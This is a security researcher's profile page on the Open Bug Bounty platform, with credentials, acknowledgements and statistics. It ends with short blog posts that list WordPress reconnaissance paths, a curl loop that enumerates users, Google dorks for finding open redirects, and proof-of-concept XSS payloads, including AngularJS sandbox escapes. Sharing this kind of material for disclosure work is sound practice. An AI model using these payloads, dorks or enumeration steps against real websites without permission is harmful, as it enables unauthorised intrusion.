MiguelSantareno | Security Researcher Profile
Security researcher MiguelSantareno has already helped fix 1142 vulnerabilities.
Researcher reputation: 240
Real name:
Miguel Santareno
About me:
Public work and profiles:
https://miguelsantareno.github.io/
https://hackerone.com/miguel_santareno
https://www.intigriti.com/profile/miguelsantareno
https://yeswehack.com/hunters/miguelsantareno
https://bugcrowd.com/MiguelSantareno
Contact email:
m1ke460 at hotmail dot com
Alternative Contacts:
https://twitter.com/MiguelSantareno
https://www.linkedin.com/in/miguelsantareno
Certifications & Diplomas:
eCPPT
eWPT
CSIL-CDWI
CSIL-COA
CEH
CPTE
CVE-2022-23377
CVE-2022-23865
Experience in Application Security
1-3 years
Award / Bug Bounty I prefer:
Recommendations.
Swag.
Money.
Halls of Fame:
Ericsson
Oracle
Cisco
EC-Council
ASUS
Atos
SAP
Nokia
Hitachi
SonicWall
Siemens
Microsoft
United Nations
Trend Micro
BMW
AT&T
CERT-EU
etc...
Ethics and Rules:
Miguel Santareno is required to abide by the ethics and rules of the Open Bug Bounty project. If you reasonably believe that rules are not respected, please report this to us.
Recommendations and Acknowledgements
Miguel Santareno made us aware of several security vulnerabilities across several sections of our platform needed to be rectified due to them being a security risk. It was a pleasure working with him and I hope we can work again in the future, Thank you! |
Thanks to Miguel that reported a XSS vulnerability in one of our websites. Excellent service. The problem is now solved and tested. Great help, Many thanks |
Miguel showed us several information disclosure issues with our site. Thank you very much Miguel! |
Miguel helped us to identify several bugs in our wordpress instances. His reports were sufficiently detailed and communication was flawless and fast. Thank you very much! |
Miguel found a important security issue in our webpage and send us very good information about solutions. Thanks a lot. |
Miguel found a issue in our wordpress site and was quick to report it. Thank you |
Miguel has found a XSS vulnerability in our search page. The example he gave helped to test our fix. Thank you! |
I would like to thank Miguel for identifying the security issue, providing all relevant information to enable a fix to be deployed and confirming the resolution. Incredibly useful to get his input on the issue and his very helpful steps to reproduce were appreciated. Very helpful and friendly. |
Identified an XSS vulnerability on our website and was very friendly and supportive! Many thanks. |
Identified an XSS vulnerability in one website and show us where is it. After that made changes in code to solve it All solved. Great help, great support. |
Shows the first 10 recommendations. See all.
Honor Badges
Number of Secured Websites
|
|
|
|
10+ Websites
|
50+ Websites
|
500+ Websites
|
WEB SECURITY VETERAN
1000+ Websites
|
Advanced Security Research
|
|
|
|
WAF Bypasser
|
CSRF Master
30+ Reports
|
AppSec Logic Master
30+ Reports
|
Fastest Fix
Fix in 24 hours
|
Outstanding Achievements
|
|
|
|
Secured OBB
|
OBB Advocate
|
Improved OBB
|
Commitment to Remediate and Patch
|
|
|
|
Patch Master
55% Patched
|
Patch Guru
65% Patched
|
Patch Lord
75% Patched
|
Recommendations and Recognition
|
|
|
|
REPUTABLE
10+ Recommends
|
FAMOUS
25+ Recommends
|
GLOBALLY TRUSTED
50+ Recommends
|
Distinguished Blog Author
|
|
|
|
1 Post
|
3 Posts
|
5+ Posts
|
Research Statistics
Total reports: | 1450 |
Total reports on VIP sites: | 97 |
Total patched vulnerabilities: | 1142 |
Recommendations received: | 20 |
Active since: | 20.06.2017 |
05.09.2019 Wordpress basic auditing
Wordpress Read me
target/readme.html
Wordpress License with wordpress version
target/license.txt
Wordpress sample config:
target/wp-config-sample.php
Wordpress installation:
target/wp-admin/install.php
Wordpress upgrade file:
target/wp-admin/upgrade.php
Wordpress setup config:
target/wp-admin/setup-config.php
Wordpress Api usefull paths:
target/wp-json/wp/v2/users - enumerate users
target/wp-json/wp/v2/posts - enumerate posts
target/wp-json - wordpress api
Script to enumerate users thought authors of blog:
for i in {1..30}; do curl -s -L -i target | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z-.]|Location:." | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done
Wordpress Plugins readme or license:
target/wp-content/plugins/plugin name/readme.txt or /license.txt
Wordpress Theme readme or license:
target/wp-content/theme/nome-do-theme/readme.txt, /changeglog.txt or /license.txt
05.09.2019 Payloads for all type off web attacks
02.04.2019 Google Dorks to find open redirects:
inurl:url=https
inurl:url=http
inurl:u=https
inurl:u=http
inurl:redirect?https
inurl:redirect?http
inurl:redirect=https
inurl:redirect=http
inurl:link=http
inurl:link=https
02.04.2019 Cross Site Script angular payloads:
1.0.1 - 1.1.5
Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
Jan Horn (Google)
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
30.03.2019 List off basic Cross site script playloads
"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")>
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt
'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script>
><script>alert`1`</script>
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>
Please login via Twitter to add a recommendation